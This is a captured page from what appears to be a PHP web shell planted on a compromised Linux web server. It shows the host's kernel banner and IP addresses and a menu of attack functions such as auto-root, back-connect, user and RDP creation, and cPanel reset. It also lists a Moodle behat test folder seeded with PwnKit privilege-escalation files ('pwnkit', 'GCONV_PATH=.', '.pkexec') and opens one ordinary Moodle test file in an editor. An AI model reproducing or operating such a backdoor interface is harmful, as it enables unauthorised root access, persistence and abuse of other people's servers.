Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.70.179.148
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead /
message /
tests /
behat /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
behat_message.php
11.92
KB
-rw-r--r--
block_user.feature
2.87
KB
-rw-r--r--
capability_message_any_user.fe...
1.92
KB
-rw-r--r--
delete_messages.feature
13.49
KB
-rw-r--r--
favourite_conversations.featur...
4.59
KB
-rw-r--r--
group_conversation.feature
5.16
KB
-rw-r--r--
message_admin_settings.feature
1.57
KB
-rw-r--r--
message_delete_conversation.fe...
6.42
KB
-rw-r--r--
message_drawer_manage_contacts...
3.97
KB
-rw-r--r--
message_manage_notification_pr...
3.66
KB
-rw-r--r--
message_manage_preferences.fea...
5.46
KB
-rw-r--r--
message_preferences.feature
1.47
KB
-rw-r--r--
message_send_messages.feature
4.02
KB
-rw-r--r--
mute_conversations.feature
4.71
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
self_conversation.feature
3.06
KB
-rw-r--r--
unread_messages.feature
4.55
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : message_preferences.feature
@core @core_message Feature: To be able to see and save user message preferences as admin As an admin I need to be able to view and edit message preferences for other users Background: Given the following "users" exist: | username | firstname | lastname | email | | student1 | Student | 1 | student1@emample.com | And the following "user preferences" exist: | user | preference | value | | student1 | message_provider_moodle_instantmessage_loggedin | none | | student1 | message_provider_moodle_instantmessage_loggedoff | email | @javascript Scenario: As an admin I can view and edit message preferences for a user Given I log in as "admin" And I navigate to "Messaging > Notification settings" in site administration And I set the field "email" to "1" And I press "Save changes" And I navigate to "Users > Accounts > Browse list of users" in site administration And I click on "Student 1" "link" in the "Student 1" "table_row" And I click on "Preferences" "link" in the "#region-main-box" "css_element" And I click on "Message preferences" "link" in the "#region-main-box" "css_element" And I click on "//label[@data-state='loggedoff']" "xpath_element" And I log out And I log in as "student1" And I follow "Preferences" in the user menu And I click on "Message preferences" "link" And the field "Email" matches value "0"
Close